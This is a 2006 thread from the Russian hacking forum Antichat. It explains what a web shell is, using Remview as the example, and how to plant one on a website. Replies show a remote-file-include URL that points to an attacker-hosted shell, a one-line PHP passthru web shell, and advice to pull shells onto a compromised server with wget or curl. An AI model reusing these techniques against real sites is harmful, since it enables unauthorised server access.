ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Шелл/Ремвью
  #1  
Старый 08.02.2006, 05:18
Аватар для petrovich-lamer
petrovich-lamer
Участник форума
Регистрация: 13.04.2005
Сообщений: 146
Провел на форуме:
219760

Репутация: 17
По умолчанию Шелл/Ремвью

несколько вопросов -
1) одно ли это и тоже, али нет ?
2) если АЛИ НЕТ, то был бы благодарен за любое разъяснение
3) и как можно их залить на сайт/форум ?
*не учитывая вариант со взломом админского акка и заливкой его *шелла/ремвью* через смайлы/темы и тд..
 
Ответить с цитированием

  #2  
Старый 08.02.2006, 05:27
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

1)Ремвью является одним их многих видов шеллов,ответ ДА.
3)Способов достаточно...
Например include баг,и ты можешь подключить свой сценарий,тоесть дать ссылу на сервер где лежит твой Ремвью.В результате чего ты сможешь залить любой шелл.
Пример:http://www.anyhost.ru/**.php?=http:/...ru/remviev.php
Есть в бажном скрипте указан что подключаемый файл *php,то просто
http://www.anyhost.ru/**.php?=http:/...rod.ru/remview
Удачи и всё такое
 
Ответить с цитированием

  #3  
Старый 08.02.2006, 08:26
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию

вебшелов существует множество на разных яхыках програмирования от самого банального <? passthru("$cmd"); ?> до "монстров" типа nfm и Ремвью из их числа причем не самый лучший.
залить также масса вариантов. способы зависит зависят от конкретой уязвимости ,например заливка с помошю другого более простого предварительно залитого шела того же passthru или уязвимостей типо remote command execution в этих случиях заливается с другого серва (например предварительно созданого тобой акка на халявном хосте ) с помощью какойнить установленной на атакуемой тачки качалки (wget,get,curl,fetch,lynx )узнать наличие которой можно командой which.

А вообще смотри побольше видео там всё расжованно,не важно даже если описываемая уязвимость неактуальна,научишся многому и не будешь задавать подобных вопросов.
 
Ответить с цитированием

  #4  
Старый 08.02.2006, 10:37
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

1. на вашь вопрос ответить нельзя, т.к. ремвью - руское название скрипта а шелл - с английского оболочка
2. шелл - как уже сказал оболочка. это может быть текст в песне, слово в учебнике за 7 класс, и какой-то вид доступа к серверу. смысл шелла в том что ты можешь каким-то образом управлять сервером. например SSH-шел - это запущеный на сервере sshd демон, а у тебя вдруг есть логин и пароль. или веб-шелл. один из часто используемых скриптов для "администрирования" сайта - remview.php (Remote View). Он то и дает веб шелл (тоесть возможность выполнять команды, читать директории и файлы).
Ненадо путать слова.
 
Ответить с цитированием

  #5  
Старый 08.02.2006, 16:24
Аватар для petrovich-lamer
petrovich-lamer
Участник форума
Регистрация: 13.04.2005
Сообщений: 146
Провел на форуме:
219760

Репутация: 17
По умолчанию

хех, КЕЗ, ну я спросил для ознакомления...
терь знаю, что Шелл - это сам процесс выполнения команд (типа доступ), А ремвью - php скрипт, позволяющий реализовать такую возможность
так ?
 
Ответить с цитированием

  #6  
Старый 08.02.2006, 20:29
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Да...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ